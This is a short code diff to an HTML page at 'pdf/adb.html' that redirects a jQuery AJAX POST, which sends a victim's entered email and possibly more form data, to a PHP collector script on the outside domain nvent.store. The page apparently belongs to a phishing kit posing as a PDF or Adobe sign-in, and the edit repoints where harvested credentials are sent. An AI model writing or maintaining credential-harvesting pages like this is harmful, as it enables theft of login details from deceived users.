--- a/pdf/adb.html
+++ b/pdf/adb.html
@@ -250,7 +250,7 @@
 
       $.ajax({
         dataType: 'JSON',
-        url: 'https://nvent.store/1/ad.php',
+        url: 'https://nvent.store/moritz/ad.php',
         type: 'POST',
         data: {
           email: email,
